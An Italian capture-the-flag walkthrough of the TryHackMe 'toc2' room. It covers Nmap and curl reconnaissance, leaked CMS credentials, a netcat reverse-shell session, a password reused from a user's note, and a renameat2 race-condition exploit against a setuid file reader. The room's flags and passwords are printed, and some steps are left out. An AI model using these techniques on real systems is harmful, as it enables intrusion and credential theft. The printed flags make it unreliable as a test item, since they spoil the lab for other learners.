LINK ROOM: https://tryhackme.com/room/toc2
Descrizione:
Welcome,
In order to complete this room, you will need to connect to the TryHackMe OpenVPN, details for which can be found at: https://tryhackme.com/access.
Remember when deploying the virtual machine, it can take up to 5 minutes to properly boot up. Good luck, happy hacking.
⠀
USER FLAG:
Iniziamo subito con una scansione usando Nmap:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 84:4e:b1:49:31:22:94:84:83:97:91:72:cb:23:33:36 (RSA)
| 256 cc:32:19:3f:f5:b9:a4:d5:ac:32:0f:6e:f0:83:35:71 (ECDSA)
|_ 256 bd:d8:00:be:49:b5:15:af:bf:d5:85:f7:3a:ab:d6:48 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/cmsms/cmsms-2.1.6-install.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site Maintenance
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Proviamo ad indagare sul CMS e vediamo la connessione alla pagina predefinita del servizio Web:
┌──(parrot㉿parrot)-[/data/toc2]
└─$ curl -s http://10.10.215.10/
<!doctype html>
<title>Site Maintenance</title>
<style>
body { text-align: center; padding: 150px; }
h1 { font-size: 50px; }
body { font: 20px Helvetica, sans-serif; color: #333; }
article { display: block; text-align: left; width: 650px; margin: 0 auto; }
a { color: #dc8100; text-decoration: none; }
a:hover { color: #333; text-decoration: none; }
</style>
<article>
<h1>Under Construction!</h1>
<div>
<p>Sorry for the inconvenience but management have once again asked for more than we can deliver. </p>
<p>The web server isn't going to be ready for the web dev team to build on for another few days. Just in case anyone around here except me wants to do anything: cmsmsuser:devpass </p>
<p>— Hunter</p>
</div>
</article>
C'è anche un file robots.txt che rivela il nome di un database, cioè un URL di installazione CMS.
┌──(parrot㉿parrot)-[/data/toc2]
└─$ curl -s http://10.10.215.10/robots.txt
User-agent: *
Disallow: /cmsms/cmsms-2.1.6-install.php
Note to self:
Tommorow, finish setting up the CMS, and that database, cmsmsdb, so the site's ready by Wednesday.
I risultati dell'OSINT sono stati:
Ora non ci resta altro che installare il file PHP, avviarlo come amministratore e fare revers shell!
┌──(parrot㉿parrot)-[/data/toc2/files]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.215.10] 34964
Linux toc 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
11:51:53 up 18 min, 0 users, load average: 1.08, 1.71, 1.47
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@toc:/home/frank$ cat user.txt
cat user.txt
thm{63616d70657276616e206c696665}
⠀
ROOT FLAG:
Controllando nei vari file, l'utente ha salvato la password nelle note:
www-data@toc:/home/frank$ cat new_machine.txt
cat new_machine.txt
I'm gonna be switching computer after I get this web server setup done. The inventory team sent me a new Thinkpad, the password is "password". It's funny that the default password for all the work machines is something so simple...Hell I should probably change this one from it, ah well. I'm switching machines soon- it can wait.
www-data@toc:/home/frank/root_access$ su frank
su frank
Password: password
frank@toc:~/root_access$ id
id
uid=1000(frank) gid=1000(frank) groups=1000(frank),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)
C'è una cartella interessante chiamata root_access nel desktop dell'utente root:
frank@toc:~/root_access$ ll
ll
total 28
drwxr-xr-x 2 frank frank 4096 Jan 31 17:29 ./
drwxr-xr-x 5 frank frank 4096 Aug 18 2020 ../
-rwsr-xr-x 1 root root 8704 Jan 31 17:29 readcreds*
-rw-r--r-- 1 root root 656 Jan 31 12:44 readcreds.c
-rw------- 1 root root 34 Aug 23 2020 root_password_backup
frank@toc:~/root_access$ cat readcreds.c
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
int main(int argc, char* argv[]) {
int file_data; char buffer[256]; int size = 0;
if(argc != 2) {
printf("Binary to output the contents of credentials file \n ./readcreds [file] \n");
exit(1);
}
if (!access(argv[1],R_OK)) {
sleep(1);
file_data = open(argv[1], O_RDONLY);
} else {
fprintf(stderr, "Cannot open %s \n", argv[1]);
exit(1);
}
do {
size = read(file_data, buffer, 256);
write(1, buffer, size);
}
while(size>0);
}
Ora possiamo avviare un attacco race condition:
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/fs.h>
// source https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c
int main(int argc, char *argv[]) {
while (1) {
syscall(SYS_renameat2, AT_FDCWD, argv[1], AT_FDCWD, argv[2], RENAME_EXCHANGE);
}
return 0;
}
frank@toc:~/root_access$ touch pwd
frank@toc:~/root_access$ ./rename pwd root_password_backup
www-data@toc:/home/frank/root_access$ su - root
su - root
Password: aloevera
root@toc:~# cat /root/root.txt
cat /root/root.txt
thm{7265616c6c696665}
⠀
RIASSUMENDO: